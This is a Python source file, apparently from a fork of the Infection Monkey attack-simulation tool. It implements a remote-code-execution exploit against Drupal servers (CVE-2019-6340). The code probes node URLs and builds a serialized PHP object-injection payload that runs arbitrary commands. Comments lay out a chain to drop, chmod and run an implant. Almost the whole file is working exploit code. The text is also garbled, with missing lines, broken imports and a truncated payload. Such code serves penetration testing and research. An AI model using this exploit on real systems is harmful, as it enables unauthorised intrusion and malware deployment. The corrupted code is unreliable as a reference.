forked from p15670423/monkey
201 lines
7.6 KiB
201 lines
7.6 KiB
Remote Code Execution on Drupal server - CVE-2019-6340
Implementation is based on:
import logging
from urllib.parse import urljoin
import requests
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT, MEDIUM_REQUEST_TIMEOUT
from import remove_port
from infection_monkey.exploit.web_rce import WebRCE
from infection_monkey.model import ID_STRING
__author__ = "Ophir Harpaz"
LOG = logging.getLogger(__name__)
class DrupalExploiter(WebRCE):
_TARGET_OS_TYPE = ["linux", "windows"]
_EXPLOITED_SERVICE = "Drupal Server"
def __init__(self, host):
super(DrupalExploiter, self).__init__(host)
def get_exploit_config(self):
We override this function because the exploits requires a special extension in the URL,
e.g. an exploited URL would be<port>/node/3.
:return: the Drupal exploit config
exploit_config = super(DrupalExploiter, self).get_exploit_config()
exploit_config["url_extensions"] = [
"node/", # In Linux, no path is added
] # However, Bitnami installations are under /drupal
exploit_config["dropper"] = True
return exploit_config
def add_vulnerable_urls(self, potential_urls, stop_checking=False):
We need a specific implementation of this function in order to add the URLs *with the
node IDs*.
We therefore check, for every potential URL, all possible node IDs.
:param potential_urls: Potentially-vulnerable URLs
:param stop_checking: Stop if one vulnerable URL is found
:return: None (in-place addition)
for url in potential_urls:
node_ids = find_exploitbale_article_ids(url)
if node_ids is None:
|"Could not find a Drupal node to attack")
for node_id in node_ids:
node_url = urljoin(url, str(node_id))
if self.check_if_exploitable(node_url):
) # This is for report. Should be refactored in the future
if stop_checking:
except Exception as e: # We still don't know which errors to expect
LOG.error(f"url {url} failed in exploitability check: {e}")
if not self.vulnerable_urls:
|"No vulnerable urls found")
def check_if_exploitable(self, url):
Check if a certain URL is exploitable.
We use this specific implementation (and not simply run self.exploit) because this
function does not "waste"
a vulnerable URL. Namely, we're not actually exploiting, merely checking using a heuristic.
:param url: Drupal's URL and port
:return: Vulnerable URL if exploitable, otherwise False
payload = build_exploitability_check_payload(url)
response = requests.get( # noqa: DUO123
headers={"Content-Type": "application/hal+json"},
if is_response_cached(response):
|"Checking if node {url} is vuln returned cache HIT, ignoring")
return False
return "INVALID_VALUE does not correspond to an entity on this site" in response.text
def exploit(self, url, command):
# pad a easy search replace output:
cmd = f"echo {ID_STRING} && {command}"
base = remove_port(url)
payload = build_cmd_execution_payload(base, cmd)
r = requests.get( # noqa: DUO123
headers={"Content-Type": "application/hal+json"},
if is_response_cached(r):
|"Exploiting {url} returned cache HIT, may have failed")
if ID_STRING not in r.text:
LOG.warning("Command execution _may_ have failed")
result = r.text.split(ID_STRING)[-1]
return result
def get_target_url(self):
We're overriding this method such that every time self.exploit is invoked, we use a fresh
vulnerable URL.
Reusing the same URL eliminates its exploitability because of caching reasons :)
:return: vulnerable URL to exploit
return self.vulnerable_urls.pop()
def are_vulnerable_urls_sufficient(self):
For the Drupal exploit, 5 distinct URLs are needed to perform the full attack.
:return: Whether the list of vulnerable URLs has at least 5 elements.
# We need 5 URLs for a "full-chain": check remote files, check architecture, drop monkey,
# chmod it and run it.
num_urls_needed_for_full_exploit = 5
num_available_urls = len(self.vulnerable_urls)
result = num_available_urls >= num_urls_needed_for_full_exploit
if not result:
f"{num_urls_needed_for_full_exploit} URLs are needed to fully exploit a "
f"Drupal server "
f"but only {num_available_urls} found"
return result
def is_response_cached(r: requests.Response) -> bool:
""" Check if a response had the cache header. """
return "X-Drupal-Cache" in r.headers and r.headers["X-Drupal-Cache"] == "HIT"
def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100) -> set:
""" Find target articles that do not 404 and are not cached """
articles = set()
while lower < upper:
node_url = urljoin(base_url, str(lower))
response = requests.get( # noqa: DUO123
node_url, verify=False, timeout=LONG_REQUEST_TIMEOUT
if response.status_code == 200:
if is_response_cached(response):
|"Found a cached article at: {node_url}, skipping")
lower += 1
return articles
def build_exploitability_check_payload(url):
payload = {
"_links": {"type": {"href": f"{urljoin(url, '/rest/type/node/INVALID_VALUE')}"}},
"type": {"target_id": "article"},
"title": {"value": "My Article"},
"body": {"value": ""},
return payload
def build_cmd_execution_payload(base, cmd):
payload = {
"link": [
"value": "link",
"options": 'O:24:"GuzzleHttp\\Psr7\\FnStream":2:{s:33:"\u0000'
"".replace("|size|", str(len(cmd))).replace("|command|", cmd),
"_links": {"type": {"href": f"{urljoin(base, '/rest/type/shortcut/default')}"}},
return payload